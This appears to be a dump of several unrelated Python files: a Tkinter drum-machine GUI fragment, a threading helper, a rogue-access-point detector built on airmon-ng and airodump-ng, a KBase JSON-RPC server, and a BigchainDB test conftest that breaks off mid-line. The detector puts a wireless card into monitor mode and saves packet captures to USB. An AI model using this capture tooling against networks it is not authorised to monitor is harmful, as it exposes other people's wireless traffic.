self.number_of_units_widget = Spinbox(topbar_frame, from_=1, to=MAX_NUMBER_OF_UNITS, width=5,
command=self.on_number_of_units_changed)
self.number_of_units_widget.delete(0,"end")
self.number_of_units_widget.insert(0,INITIAL_NUMBER_OF_UNITS)
self.number_of_units_widget.grid(row=0, column=5)
Label(topbar_frame, text='BPUs:').grid(row=0, column=6)
self.bpu_widget = Spinbox(topbar_frame, from_=1, to=MAX_BPU, width=5,
command=self.on_bpu_changed)
self.bpu_widget.grid(row=0, column=7)
self.bpu_widget.delete(0,"end")
self.bpu_widget.insert(0,INITIAL_BPU)
def create_top_menu(self):
self.menu_bar = Menu(self.root)
self.file_menu = Menu(self.menu_bar, tearoff=0)
self.file_menu.add_command(label="Load Project")
self.file_menu.add_command(label="Save Project")
self.file_menu.add_separator()
self.file_menu.add_command(label="Exit")
self.menu_bar.add_cascade(label="File", menu=self.file_menu)
self.about_menu = Menu(self.menu_bar, tearoff=0)
self.about_menu.add_command(label="About")
self.menu_bar.add_cascade(label="About", menu=self.about_menu)
self.root.config(menu=self.menu_bar)
def init_gui(self):
self.create_top_menu()
self.create_top_bar()
self.create_left_drum_loader()
self.create_right_button_matrix()
self.create_play_bar()
if __name__ == '__main__':
root = Tk()
DrumMachine(root)
root.mainloop()
|
util.py
|
import logging
from threading import Thread
from functools import wraps
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
stream_handler = logging.StreamHandler()
formatter = logging.Formatter("[%(filename)s] %(levelname)s | %(message)s")
stream_handler.setFormatter(formatter)
logger.addHandler(stream_handler)
logger.disabled = True
def threaded(func):
@wraps(func)
def wrapper(*args, **kwargs):
t_handler = Thread(target=func, args=args, kwargs=kwargs)
t_handler.daemon = True
t_handler.start()
return wrapper
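# A minimal usage sketch (not part of the original module), applying the decorator to a
# hypothetical worker function; the wrapped call returns immediately and runs on a daemon thread.
if __name__ == "__main__":
    import time

    @threaded
    def countdown(n):
        for i in range(n, 0, -1):
            print("tick", i)
            time.sleep(0.1)

    countdown(3)     # returns at once; the ticks are printed from the background thread
    time.sleep(0.5)  # keep the main thread alive long enough for the daemon thread to finish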
|
Aircrack.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Aircrack.py
#
# Copyright 2013 Brandon Knight <kaospunk@gmail.com>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import calendar
import datetime
import glob
import os
import shutil
import subprocess
import time
from Adafruit_CharLCDPlate import *
from EspeakDriver import EspeakDriver
from FrequencyGenerator import FrequencyGenerator
from LCD import *
from threading import Thread, Event
from xml.etree import ElementTree
class Airmon:
airmon_bin = "/usr/sbin/airmon-ng"
iwconfig_bin = "/sbin/iwconfig"
def __init__(self, interface):
self.interface = interface
def stop(self):
subprocess.Popen([self.airmon_bin, "stop", "mon0"], bufsize=0, stdout=open(os.devnull, "w"), stderr=open(os.devnull, "w"))
time.sleep(5)
def start(self):
airmon = subprocess.Popen([self.airmon_bin, "start", self.interface], bufsize=0, stdout=open(os.devnull, "w"), stderr=open(os.devnull, "w"))
time.sleep(5)
def restart(self):
self.stop()
self.start()
class Airodump:
base_dir = '/home/securestate/'
airodump_bin = '/usr/sbin/airodump-ng'
whitelist_file = 'apwhitelist.txt'
usb_dir = '/media/usbdevice/'
MINIMUM_SIGNAL = -110
def __init__(self, lcd, essid = None, bssid = None, channel = None):
self.bssid = bssid
self.channel = channel
self.essid = essid
if essid == None:
self.capture_file = "main"
else:
self.capture_file = bssid.replace(":", "_") + essid
self.lcd = lcd
self.tone = FrequencyGenerator()
self.rssi_event = Event()
self.parse_event = Event()
self.espeak_drv = EspeakDriver()
self.rogue_aps = []
self.good_aps = []
self.get_whitelist()
def stop(self):
self.proc_handle.terminate()
time.sleep(5)
self.parse_event.clear()
def start(self):
if self.capture_file == "main":
self.proc_handle = subprocess.Popen([self.airodump_bin, "-w", "main", "mon0"], bufsize=0, stdout=open(os.devnull, "w"), stderr=open(os.devnull, "w"))
self.parse_event.set()
self.parse_thread = Thread(target=self.parser)
self.parse_thread.daemon = True
self.parse_thread.start()
else:
self.proc_handle = subprocess.Popen([self.airodump_bin, "--bssid", self.bssid, "--channel", self.channel, "-w", self.capture_file, "mon0"], bufsize=0, stdout=open(os.devnull, "w"), stderr=open(os.devnull, "w"))
def restart(self):
self.stop()
self.start()
def locate(self):
self.lcd.set_color("red")
self.lcd.display("Locking on")
self.start()
self.rssi_event.set()
self.rssi = Thread(target=self.rssi_tone)
self.rssi.start()
while self.rssi.is_alive() and self.lcd.get_button_press(False) != "Select":
pass
self.rssi_event.clear()
self.stop()
self.lcd.wipe()
return
def rssi_tone(self):
if self.capture_file == "main":
return
signal = True
time.sleep(5)
latest_file = self.get_latest_file()
print "Using " + latest_file
while signal:
if not self.rssi_event.is_set():
break
try:
tree = ElementTree.parse(latest_file)
except:
continue
root = tree.getroot()
for network in root.findall("wireless-network"):
rssi = network.find("snr-info/last_signal_rssi").text
print rssi
essid = network.find("SSID/essid").text
last_seen = network.get("last-time")
print last_seen
(dow, month, day, ltime, year) = last_seen.split()
for mon in xrange(1, 13):
if calendar.month_abbr[mon] == month:
break
(hour, minute, second) = ltime.split(":")
lastseen = datetime.datetime(int(year), mon, int(day), int(hour), int(minute), int(second))
delta = datetime.datetime.now() - lastseen
print "Delta " + str(delta)
if delta.total_seconds() > 60:
self.lcd.display("Signal Lost", 2)
signal = False
self.rssi_event.clear()
break
abs_value = abs(int(rssi))
freq = float(2.5/abs_value) * 10000
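# e.g. an RSSI of -50 dBm gives 2.5/50 * 10000 = 500 Hz, while -100 dBm gives 250 Hz,
# so a stronger signal produces a higher-pitched tone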
self.lcd.display("Target: {0}dbm\n{1}".format(rssi, essid))
self.tone.sine_wave(freq)
def get_signal_strength(self, bssid):
if self.capture_file == "main":
return
file = self.get_latest_file()
tree = ElementTree.parse(file)
root = tree.getroot()
for network in root.findall("wireless-network"):
if network.find("BSSID").text == bssid:
return network.find("snr-info/last_signal_rssi")
def get_latest_file(self):
latest_track = 0
latest_file = ''
for file in glob.glob(self.base_dir + self.capture_file + "*.kismet.netxml"):
pieces = file.split("-")
number = int(pieces[-1].split(".")[0])
if number > latest_track:
latest_track = number
latest_file = file
return latest_file
def get_whitelist(self):
ap_file = open(self.base_dir + self.whitelist_file, 'r')
for ap in ap_file:
self.good_aps.append(ap.rstrip())
def clear_rogues(self):
del self.rogue_aps[:]
def parser(self):
latest_file = self.get_latest_file()
time.sleep(5)
while self.parse_event.is_set():
try:
tree = ElementTree.parse(latest_file)
except:
continue
root = tree.getroot()
for network in root.findall("wireless-network"):
rssi = int(network.find("snr-info/last_signal_rssi").text)
essid = network.find("SSID/essid").text
bssid = network.find("BSSID").text
channel = network.find("channel").text
found = False
for rogue in self.rogue_aps:
if rogue[1] == bssid:
found = True
if not found and bssid not in self.good_aps and rssi > self.MINIMUM_SIGNAL:
self.rogue_aps.append((essid, bssid, channel))
print("New rogue AP found with name: {0}".format(essid))
self.espeak_drv.speak('New Rogue AP found with name {0}'.format(essid))
def update_whitelist(self):
del self.good_aps[:]
try:
source_file = open(self.usb_dir + self.whitelist_file, 'r')
output_string = ''
for ap in source_file:
self.good_aps.append(ap.rstrip())
output_string += ap
for rogue in self.rogue_aps:
if rogue[1] == ap.rstrip():
self.rogue_aps.remove(rogue)
dest_file = open(self.base_dir + self.whitelist_file, 'w')
dest_file.write(output_string)
return "Success"
except Exception as e:
return "Error occurred"
def backup_files(self):
try:
for file in glob.glob(self.base_dir + "*.csv"):
shutil.copy(file, self.usb_dir + file.split("/")[-1])
for file in glob.glob(self.base_dir + "*.cap"):
shutil.copy(file, self.usb_dir + file.split("/")[-1])
for file in glob.glob(self.base_dir + "*.netxml"):
shutil.copy(file, self.usb_dir + file.split("/")[-1])
return "Success"
except Exception:
return "Error occurred"
def main():
lcd = LCD()
airmon = Airmon("wlan0")
airmon.start()
main_airdump = Airodump(lcd)
main_airdump.start()
for x in xrange(100):
print str(x)
time.sleep(1)
main_airdump.stop()
print "done"
if __name__ == "__main__":
main()
|
kb_hisat2Server.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import requests as _requests
import random as _random
import os
from kb_hisat2.authclient import KBaseAuth as _KBaseAuth
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'kb_hisat2'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from kb_hisat2.kb_hisat2Impl import kb_hisat2 # noqa @IgnorePep8
impl_kb_hisat2 = kb_hisat2(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if isinstance(e.message, basestring):
newerr.data = e.message
else:
# Some exceptions embed other exceptions as the message
newerr.data = repr(e.message)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # noqa @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'kb_hisat2'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_kb_hisat2.run_hisat2,
name='kb_hisat2.run_hisat2',
types=[dict])
self.method_authentication['kb_hisat2.run_hisat2'] = 'required' # noqa
self.rpc_service.add(impl_kb_hisat2.status,
name='kb_hisat2.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'kb_hisat2 ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'Request method was %s\n' % environ['REQUEST_METHOD']
# print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ)
# print 'Request body was: %s' % request_body
# print 'Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system-assigned port
in the main thread. Execution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
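# A minimal usage sketch (not part of the original module): running the service in a child
# process so it can later be stopped programmatically.
#
# port = start_server(host='localhost', port=0, newprocess=True)
# print "kb_hisat2 service listening on port %s" % port
# ... issue JSON-RPC POST requests against http://localhost:<port>/ ...
# stop_server()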
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
conftest.py
|
"""Fixtures and setup / teardown functions
Tasks:
1. setup test database before starting the tests
2. delete test database after running the tests
"""
import os
import copy
import random
from collections import namedtuple
from logging import getLogger
from logging.config import dictConfig
import pytest
from pymongo import MongoClient
from bigchaindb.common import crypto
TEST_DB_NAME = 'bigchain_test'
USER2_SK, USER2_PK = crypto.generate_key_pair()
# Test user. Inputs will be created for this user. Cryptographic keys:
USER_PRIVATE_KEY = '8eJ8q9ZQpReWyQT5aFCiwtZ5wDZC4eDnCen88p3tQ6ie'
USER_PUBLIC_KEY = 'JEAkEJqLbbgDRAtMm8YAjGp759Aq2qTn9eaEHUj2XePE'
def pytest_runtest_setup(item):
if isinstance(item, item.Function):
backend = item.session.config.getoption('--database-backend')
if (item.get_marker('localmongodb') and backend != 'localmongodb'):
pytest.skip('Skip tendermint specific tests if not using localmongodb')
def pytest_addoption(parser):
from bigchaindb.backend.connection import BACKENDS
BACKENDS['mongodb-ssl'] = 'bigchaindb.backend.mongodb.connection.MongoDBConnection'
backends = ', '.join(BACKENDS.keys())
parser.addoption(
'--database-backend',
action='store',
default=os.environ.get('BIGCHAINDB_DATABASE_BACKEND', 'rethinkdb'),
help='Defines the backend to use (available: {})'.format(backends),
)
def pytest_ignore_collect(path, config):
from bigchaindb.backend.connection import BACKENDS
path = str(path)
BACKENDS['mongodb-ssl'] = 'bigchaindb.backend.mongodb.connection.MongoDBConnection'
supported_backends = BACKENDS.keys()
if os.path.isdir(path):
dirname = os.path.split(path)[1]
if dirname in supported_backends and dirname != config.getoption('--database-backend'):
print('Ignoring unrequested backend test dir: ', path)
return True
def pytest_configure(config):
config.addinivalue_line(
'markers',
'bdb(): Mark the test as needing BigchainDB, i.e. a database with '
'the three tables: "backlog", "bigchain", "votes". BigchainDB will '
'be configured such that the database and tables are available for an '
'entire test session. For distributed tests, the database name will '
'be suffixed with the process identifier, e.g.: "bigchain_test_gw0", '
'to ensure that each process session has its own separate database.'
)
config.addinivalue_line(
'markers',
'genesis(): Mark the test as needing a genesis block in place. The '
'prerequisite steps of configuration and database setup are taken '
'care of at session scope (if needed), prior to creating the genesis '
'block. The genesis block has function scope: it is destroyed after '
'each test function/method.'
)
@pytest.fixture(autouse=True)
def _bdb_marker(request):
if request.keywords.get('bdb', None):
request.getfixturevalue('_bdb')
@pytest.fixture(autouse=True)
def _genesis_marker(request):
if request.keywords.get('genesis', None):
request.getfixturevalue('_genesis')
@pytest.fixture(autouse=True)
def _restore_config(_configure_bigchaindb):
from bigchaindb import config, config_utils
config_before_test = copy.deepcopy(config)
yield
config_utils.set_config(config_before_test)
@pytest.fixture
def _restore_dbs(request):
from bigchaindb.backend import connect, schema
from bigchaindb.common.exceptions import DatabaseDoesNotExist
from .utils import list_dbs
conn = connect()
dbs_before_test = list_dbs(conn)
yield
dbs_after_test = list_dbs(conn)
dbs_to_delete = (
db for db in set(dbs_after_test) - set(dbs_before_test)
if TEST_DB_NAME not in db
)
print(dbs_to_delete)
for db in dbs_to_delete:
try:
schema.drop_database(conn, db)
except DatabaseDoesNotExist:
pass
@pytest.fixture(scope='session')
def _configure_bigchaindb(request, ssl_context):
import bigchaindb
from bigchaindb import config_utils
test_db_name = TEST_DB_NAME
# Put a suffix like _gw0, _gw1 etc on xdist processes
xdist_suffix = getattr(request.config, 'slaveinput', {}).get('slaveid')
if xdist_suffix:
test_db_name = '{}_{}'.format(TEST_DB_NAME, xdist_suffix)
backend = request.config.getoption('--database-backend')
if backend == 'mongodb-ssl':
bigchaindb._database_map[backend] = {
# we use mongodb as the backend for mongodb-ssl
'backend': 'mongodb',
'connection_timeout': 5000,
'max_tries': 3,
'ssl': True,
'ca_cert': ssl_context.ca,
'crlfile': ssl_context.crl,
'certfile': ssl_context.cert,
'keyfile': ssl_context.key,
'keyfile_passphrase': os.environ.get('BIGCHAINDB_DATABASE_KEYFILE_PASSPHRASE', None)
}
bigchaindb._database_map[backend].update(bigchaindb._base_database_mongodb)
config = {
'database': bigchaindb._database_map[backend],
'keypair': {
'private': '31Lb1ZGKTyHnmVK3LUMrAUrPNfd4sE2YyBt3UA4A25aA',
'public': '4XYfCbabAWVUCbjTmRTFEu2sc3dFEdkse4r6X498B1s8',
}
}
config['database']['name'] = test_db_name
config = config_utils.env_config(config)
config_utils.set_config(config)
@pytest.fixture(scope='session')
def _setup_database(_configure_bigchaindb):
from bigchaindb import config
from bigchaindb.backend import connect, schema
from bigchaindb.common.exceptions import DatabaseDoesNotExist
print('Initializing test db')
dbname = config['database']['name']
conn = connect()
try:
schema.drop_database(conn, dbname)
except DatabaseDoesNotExist:
pass
schema.init_database(conn)
print('Finishing init database')
yield
print('Deleting `{}` database'.format(dbname))
conn = connect()
try:
schema.drop_database(conn, dbname)
except DatabaseDoesNotExist:
pass
print('Finished deleting `{}`'.format(dbname))
@pytest.fixture
def _bdb(_setup_database, _configure_bigchaindb):
from bigchaindb import config
from bigchaindb.backend import connect
from bigchaindb.backend.admin import get_config
from bigchaindb.backend.schema import TABLES
from .utils import flush_db, update_table_config
conn = connect()
# TODO remove condition once the mongodb implementation is done
if config['database']['backend'] == 'rethinkdb':
table_configs_before = {
t: get_config(conn, table=t) for t in TABLES
}
yield
dbname = config['database']['name']
flush_db(conn, dbname)
# TODO remove condition once the mongodb implementation is done
if config['database']['backend'] == 'rethinkdb':
for t, c in table_configs_before.items():
update_table_config(conn, t, **c)
@pytest.fixture
def _genesis(_bdb, genesis_block):
# TODO for precision's sake, delete the block once the test is done. The
# deletion is done indirectly via the teardown code of _bdb but explicit
# deletion of the block would make things clearer. E.g.:
# yield
# tests.utils.delete_genesis_block(conn, dbname)
pass
# We need this function to avoid loading an existing
# conf file located in the home of the user running
# the tests. If it's too aggressive we can change it
# later.
@pytest.fixture
def ignore_local_config_file(monkeypatch):
def mock_file_config(filename=None):
return {}
monkeypatch.setattr('bigchaindb.config_utils.file_config',
